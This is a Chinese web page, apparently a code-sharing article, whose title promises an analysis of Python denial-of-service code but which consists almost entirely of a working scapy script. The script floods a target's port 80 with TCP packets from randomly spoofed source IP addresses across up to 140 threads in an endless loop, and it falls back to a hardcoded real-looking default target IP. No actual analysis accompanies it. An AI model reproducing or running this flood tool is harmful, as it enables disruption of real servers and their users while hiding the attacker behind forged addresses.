分析python服务器拒绝服务攻击代码

时间:2021-05-22

复制代码 代码如下:
# -*- coding: cp936 -*-
from scapy.all import *
from threading import Thread,activeCount
from random import randint

class Loop(Thread):
def __init__(self,remoteAddr):
Thread.__init__(self)
self.remoteAddr = remoteAddr

def run(self):
ip = str(randint(0,255))+'.'\
+str(randint(0,255))+'.'\
+str(randint(0,255))+'.'\
+str(randint(0,255))
sr1(IP(src = ip,dst = self.remoteAddr)/TCP(dport = 80),retry = 0,verbose = 0,timeout = 3)


class Main(Thread):
def __init__(self,remoteAddr):
Thread.__init__(self)
self.remoteAddr = remoteAddr

def run(self):
limit = 140
total = 0

while True:
if activeCount() < limit:
Loop(remoteAddr = self.remoteAddr).start()
total = total + 1
print '目前已经进行的HttpFlood的次数为:',total

if __name__ == '__main__':
remoteAddr = raw_input('IP=')
if remoteAddr == '':
remoteAddr = '202.103.25.12'

Main(remoteAddr = remoteAddr).start()

声明:本页内容来源网络,仅供用户参考;我单位不保证亦不表示资料全面及准确无误,也不保证亦不表示这些资料为最新信息,如因任何原因,本网内容或者用户因倚赖本网内容造成任何损失或损害,我单位将不会负任何法律责任。如涉及版权问题,请提交至online#300.cn邮箱联系删除。

相关文章